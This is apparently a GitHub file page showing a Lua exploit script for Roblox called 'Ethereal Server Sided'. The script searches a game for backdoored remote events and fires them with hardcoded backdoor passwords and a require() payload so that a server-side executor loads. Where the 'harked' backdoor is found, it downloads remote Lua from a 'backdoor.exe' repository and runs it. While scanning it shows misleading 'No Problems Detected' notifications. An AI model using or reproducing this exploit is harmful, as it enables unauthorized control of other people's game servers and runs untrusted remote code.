-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathEthereal Server Sided (1)
More file actions
106 lines (87 loc) · 3.26 KB
/
Ethereal Server Sided (1)
File metadata and controls
106 lines (87 loc) · 3.26 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
local LocalPlayer = game:GetService("Players").LocalPlayer
local requireScript = ("require(5887966886).EH('%s')"):format(LocalPlayer.Name)
local invCode = "Coming Soon"
local alternativeSS = {
run = { [1] = "5#lGIERKWEF" },
emma = { [1] = "pwojr8hoc0-gr0yxohlgp-0feb7ncxed", [2] = ",,,,,,,,,,,,,,," },
helpme = { [1] = "helpme" },
pickett = { [1] = "cGlja2V0dA==" },
harked = "https://raw.githubusercontent.com/iK4oS/backdoor.exe/indev/harkedSS.lua"
}
local function notify(text)
game:GetService("StarterGui"):SetCore(
"SendNotification",
{
Title = "Ethereal Server Sided",
Duration = 3,
Text = text
}
)
end
local function attached(possibleWait)
if possibleWait then wait(possibleWait) end
return LocalPlayer.PlayerGui:FindFirstChild("Project Ligma.exe")
end
local function validRemote(rm, _className)
local fullName = rm:GetFullName()
if string.find(fullName, "DefaultChat") then return false end
if string.find(fullName, LocalPlayer.Name) then return false end
if rm:FindFirstChild("__FUNCTION") then return false end
if rm.Parent == game:GetService("JointsService") then return false end
if rm.ClassName ~= _className then return false end
if getgenv().blacklisted then
if table.find(getgenv().blacklisted, fullName) then return false end
end
return true
end
local function harked()
local backpack = LocalPlayer.Backpack
return backpack:FindFirstChild("HandlessSegway") and
Backpack.HandlessSegway:FindFirstChild("RemoteEvents") and
Backpack.HandlessSegway.RemoteEvents:FindFirstChild("DestroySegway")
end
local function emmaBackdoor(rm)
return rm.Name == "emma" and rm.Parent.Name == "mynameemma"
end
local function runBackdoor(rm)
return rm.Name == "Run" and
rm.Parent:FindFirstChild("Pages") and rm.Parent:FindFirstChild("R6") and
rm.Parent:FindFirstChild("Version") and rm.Parent:FindFirstChild("Title")
end
local function scanGame()
notify("Detecting Problems...")
wait(6)
notify("No Problems Detected. Enjoy.")
if harked() then
loadstring(game:HttpGetAsync(alternativeSS.harked))()
return
end
for _, remote in pairs(game:GetDescendants()) do
if validRemote(remote, "RemoteEvent") and not attached() then
if emmaBackdoor(remote) then
remote:FireServer(unpack(alternativeSS.emma), requireScript)
end
if runBackdoor(remote) then
remote:FireServer(unpack(alternativeSS.run), requireScript)
end
remote:FireServer(unpack(alternativeSS.helpme), requireScript)
remote:FireServer(unpack(alternativeSS.pickett), requireScript)
remote:FireServer(requireScript)
end
end
for _, remote in pairs(game:GetDescendants()) do
if validRemote(remote, "RemoteFunction") and not attached() then
remote:InvokeServer(requireScript)
end
end
end
local function Main()
notify("Make sure to join our Discord!\nCode: "..invCode)
scanGame()
if not attached(2) then
notify("Problems Detected. It seems that if there are problems, try again later")
end
end
if game:IsLoaded() then
pcall(Main)
end